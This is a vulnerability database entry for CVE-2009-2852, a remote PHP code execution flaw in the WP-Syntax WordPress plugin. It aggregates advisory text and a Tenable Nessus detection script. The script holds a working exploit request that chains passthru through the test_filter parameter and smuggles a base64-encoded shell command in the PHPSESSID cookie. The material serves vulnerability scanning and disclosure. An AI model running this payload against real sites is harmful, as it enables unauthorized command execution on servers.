Vulnerabilities > CVE-2009-2852 - Improper Input Validation vulnerability in Ryan.Mcgeary Wp-Syntax

047910
CVSS 6.8 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
ryan-mcgeary
wordpress
CWE-20
nessus
exploit available

Summary

WP-Syntax plugin 0.9.1 and earlier for Wordpress, with register_globals enabled, allows remote attackers to execute arbitrary PHP code via the test_filter[wp_head] array parameter to test/index.php, which is used in a call to the call_user_func_array function.

Vulnerable Configurations

Part Description Count
Application
Ryan.Mcgeary
1
Application
Wordpress
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Server Side Include (SSI) Injection
    An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
  • Cross Zone Scripting
    An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.
  • Cross Site Scripting through Log Files
    An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.

Exploit-Db

descriptionWordpress Plugin WP-Syntax <= 0.9.1 Remote Command Execution. CVE-2009-2852. Webapps exploit for php platform
fileexploits/php/webapps/9431.txt
idEDB-ID:9431
last seen2016-02-01
modified2009-08-27
platformphp
port
published2009-08-27
reporterRaz0r
sourcehttps://www.exploit-db.com/download/9431/
titleWordPress Plugin WP-Syntax <= 0.9.1 - Remote Command Execution
typewebapps

Nessus

NASL familyCGI abuses
NASL idWP_SYNTAX_CMD_EXEC.NASL
descriptionThe installation of WordPress on the remote web server includes the WP-Syntax plugin, a third-party add-on that provides clean syntax highlighting supporting a wide range of programming languages. The version of WP-Syntax installed on the remote host fails to initialize the
last seen2020-06-01
modified2020-06-02
plugin id40592
published2009-08-14
reporterThis script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/40592
titleWP-Syntax Plugin for WordPress 'apply_filters' function Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(40592);
  script_version("1.20");
  script_cvs_date("Date: 2018/11/15 20:50:19");

  script_cve_id("CVE-2009-2852");
  script_bugtraq_id(36040);
  script_xref(name:"EDB-ID", value:"9431");

  script_name(english:"WP-Syntax Plugin for WordPress 'apply_filters' function Command Execution");
  script_summary(english:"Attempts to run a command.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
command execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The installation of WordPress on the remote web server includes the
WP-Syntax plugin, a third-party add-on that provides clean syntax
highlighting supporting a wide range of programming languages.

The version of WP-Syntax installed on the remote host fails to
initialize the 'test_filter' array variable in the 'test/index.php'
script. Provided that PHP's 'register_globals' setting is enabled, an
anonymous remote attacker can leverage this issue to execute arbitrary
commands subject the privileges of the web server user id by adding a
specially crafted series of filters, which in turn will be executed in
the 'apply_filters()' function.");
  script_set_attribute(attribute:"see_also", value:"https://wordpress.org/plugins/wp-syntax/#changelog");
  script_set_attribute(attribute:"see_also", value:"https://plugins.trac.wordpress.org/changeset/395779/wp-syntax");

  script_set_attribute(attribute:"solution", value:"Upgrade to version 0.9.10 or later");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20);

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/08/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/06/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/08/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ryan.mcgeary:wp-syntax");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);

plugin = "WP-Syntax";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  path = "/wp-content/plugins/";
  checks[path + "wp-syntax/README.txt"][0] =
    make_list('=== WP-Syntax');

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext     : plugin
  );
}
if (!installed)
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) cmd = "ipconfig /all";
  else cmd = "id";
  cmds = make_list(cmd);
}
else cmds = make_list("id", "ipconfig /all");
cmd_pats = make_array();
cmd_pats["id"] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats["ipconfig /all"] = "Subnet Mask";

# Try to exploit the issue.
i = rand() % 255;
sep = string(SCRIPT_NAME, "-", unixtime());

url =
  "/wp-content/plugins/wp-syntax/test/index.php?" +
  "test_filter[wp_head][" + i + "][0]=session_start&" +
  "test_filter[wp_head][" + i + "][1]=session_id&" +
  "test_filter[wp_head][" + i + "][2]=base64_decode&" +
  "test_filter[wp_head][" + i + "][3]=passthru";

foreach cmd (cmds)
{
  exploit = cmd + ";echo '<< " + sep + "'";
  cookie = base64(str:exploit);
  cookie = cookie - strstr(cookie, "=");
  if (ereg(pattern:"[^a-zA-Z0-9]", string:cookie))
  {
    #debug_print("Can't encode exploit into a valid session identifier; skipping.");
    continue;
  }

  res = http_send_recv3(
    method      : "GET",
    port        : port,
    item        : dir + url,
    add_headers : make_array("Cookie", "PHPSESSID="+cookie),
    exit_on_fail: TRUE
  );

  # There's a problem if we see the expected command output.
  if ('ipconfig' >< cmd) pat = cmd_pats['ipconfig'];
  else pat = cmd_pats['id'];

  if (egrep(pattern:pat, string:res[2]))
  {
    if (report_verbosity > 0)
    {
      report =
        '\n' +
        "Nessus was able to execute the command '" + cmd + "' on the remote" +
        '\nhost using the following request :\n' +
        '\n' + http_last_sent_request() + '\n';
      if (report_verbosity > 1)
      {
        if (sep >< res[2])
        {
          output = res[2];
          output = output - strstr(output, string("<< ", sep));
          while ('media="screen" />' >< output)
            output = strstr(output, 'media="screen" />') - 'media="screen" />';
        }
        else output = res[2];

        snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
        report +=
          '\nThis produced the following output :\n' +
          snip + '\n' + data_protection::sanitize_uid(output:output) + '\n';
      }
      security_warning(port:port, extra:report);
    }
    else security_warning(port);
    exit(0);
  }
}
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin");

Seebug

bulletinFamilyexploit
descriptionBUGTRAQ ID: 36040 CVE(CAN) ID: CVE-2009-2852 WordPress是一款免费的论坛Blog系统。 WP-Syntax是wordpress使用的用于高亮显示代码的插件。该插件的wp-syntax/test/index.php模块没有正确地过滤对test_filter[]所传送的参数便在call_user_func_array()调用中使用: function apply_filters($tag, $string) { global $test_filter; if (!isset($test_filter[$tag])) return $string; uksort($test_filter[$tag], &quot;strnatcasecmp&quot;); foreach ($test_filter[$tag] as $priority =&gt; $functions) { if (is_null($functions)) continue; foreach($functions as $function) { $string = call_user_func_array($function, array($string)); } } return $string; } 这允许远程攻击者通过提交恶意GET请求注入并执行PHP代码。成功攻击要求打开了register_globals。 WordPress WP-Syntax &lt;= 0.9.1 厂商补丁: WordPress --------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://wordpress.org/development/2009/08/2-8-4-security-release/
idSSV:12148
last seen2017-11-19
modified2009-08-28
published2009-08-28
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-12148
titleWordPress WP-Syntax插件远程PHP代码执行漏洞